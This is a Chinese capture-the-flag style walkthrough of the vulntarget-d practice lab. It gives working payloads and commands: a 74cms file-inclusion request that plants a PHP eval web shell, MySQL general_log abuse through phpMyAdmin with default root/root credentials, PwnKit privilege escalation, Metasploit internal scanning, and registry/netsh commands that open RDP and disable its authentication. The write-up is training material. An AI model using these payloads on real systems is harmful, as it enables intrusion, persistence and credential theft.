关注WX:【小白SEC】查看更多内容……
本文仅为学习【vulntarget】,在本地环境测试验证,无其它目的,请勿进行未经授权的测试
一、靶场信息:
下载地址:
百度云链接:
链接: https://pan.baidu.com/s/1p3GDd7V3Unmq3-wSAvl7_Q
提取码:1p9p
**拓扑图:**IP信息根据本地搭建环境自行配置改变,Ubuntu需要更改静态IP
官方WP:vulntarget漏洞靶场系列(四)— vulntarget-d
二、使用到的工具、漏洞或技术:
工具:
Viper、nmap
漏洞或技术:
骑士cms相关漏洞、隧道代理、免杀
三、步骤:
- 通过端口扫描工具,查找靶机IP及端口信息,此处靶机的IP为192.168.0.108,直接扫描靶机IP信息
- 访问各个端口,发现 81 端口存在 骑士CMS:
- 此处存在文件包含GetShell漏洞,操作如下:
- 访问URL,发送POST请求:
URL:http://192.168.0.108:81/index.php?m=home&a=assign_resume_tpl
请求数据:
variable=1&tpl=<?php fputs(fopen("test.php","w"),"<?php phpinfo();eval(\$_REQUEST['test']);?>")?>; ob_flush();?>/r/n<qscms/company_show 列表名="info" 企业id="$_GET['id']"/>
- 发送成功后,再发送POST请求:
URL:http://192.168.0.108:81/index.php?m=home&a=assign_resume_tpl
请求数据:
variable=1&tpl=data/Runtime/Logs/Home/aa_bb_cc.log
#aa_bb_cc.log 2023年1月1日,则修改为:23_01_01.log
- 生成的Shell地址为:
http://192.168.0.108:81/test.php
- Viper开启监听,生成 .elf 文件并上传执行:
- 此时为低权限,进行提权操作:
- 此处使用:
exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec提权:
- 添加路由,进行内网探测,使用
auxiliary/scanner/portscan/tcp扫描:
msf6 > use auxiliary/scanner/portscan/tcp
msf6 auxiliary(scanner/portscan/tcp) > options
Module options (auxiliary/scanner/portscan/tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
CONCURRENCY 10 yes The number of concurrent ports to check per host
DELAY 0 yes The delay between connections, per thread, in milliseconds
JITTER 0 yes The delay jitter factor (maximum value by which to +/- DELAY) in milliseconds.
PORTS 1-10000 yes Ports to scan (e.g. 22-25,80,110-900)
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
THREADS 1 yes The number of concurrent threads (max one per host)
TIMEOUT 1000 yes The socket connect timeout in milliseconds
View the full module info with the info, or info -d command.
msf6 auxiliary(scanner/portscan/tcp) > set RHOSTS 192.168.52.1/24RHOSTS => 192.168.52.1/24
msf6 auxiliary(scanner/portscan/tcp) > set PORTS 21,22,23,80,443,8080,3389,445
PORTS => 21,22,23,80,443,8080,3389,445
msf6 auxiliary(scanner/portscan/tcp) > run
[+] 192.168.52.1: - 192.168.52.1:445 - TCP OPEN
[+] 192.168.52.3: - 192.168.52.3:80 - TCP OPEN
[+] 192.168.52.4: - 192.168.52.4:445 - TCP OPEN
[+] 192.168.52.4: - 192.168.52.4:80 - TCP OPEN
[*] 192.168.52.1/24: - Scanned 26 of 256 hosts (10% complete)
[*] 192.168.52.1/24: - Scanned 52 of 256 hosts (20% complete)
[*] 192.168.52.1/24: - Scanned 77 of 256 hosts (30% complete)
[*] 192.168.52.1/24: - Scanned 103 of 256 hosts (40% complete)
[*] 192.168.52.1/24: - Scanned 128 of 256 hosts (50% complete)
[*] 192.168.52.1/24: - Scanned 154 of 256 hosts (60% complete)
[*] 192.168.52.1/24: - Scanned 180 of 256 hosts (70% complete)
[*] 192.168.52.1/24: - Scanned 205 of 256 hosts (80% complete)
[*] 192.168.52.1/24: - Scanned 231 of 256 hosts (90% complete)
[*] 192.168.52.1/24: - Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/portscan/tcp) >
- 配置代理,访问发现的内网 80 端口没有什么信息,使用工具进行目录扫描:
- 访问 phpMyadmin ,弱口令:
root/root:
- 使用phpMyadmin修改日志路径getshell:
SELECT @@datadir; #获取路径信息
SHOW VARIABLES LIKE '%general%'; #查看日志状态
set global general_log=on; #将 general_log 设置为on
set global general_log_file='C:/phpstudy/PHPTutorial/www/test.php'; #修改log文件的名称和位置
SELECT 'Shell内容' #随便select一个Shell内容
- 蚁剑配置代理连接Shell:
- Viper设置代理转发上线,生成的后门程序需要免杀:
- Viper查看,此处直接使用 getsystem 提权:
- 获取密码信息,获得明文账号信息:
crow/admin:
- 开启远程登录:
reg add "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /t REG_DWORD /v portnumber /d 3389 /f
wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1
netsh advfirewall firewall add rule name="Remote Desktop" protocol=TCP dir=in localport=3389 action=allow
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0 /f
- 配置代理登录:
- 完整链路图:
需要修改虚拟机网卡
靶场WP持续更新……
扫一扫
2480
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
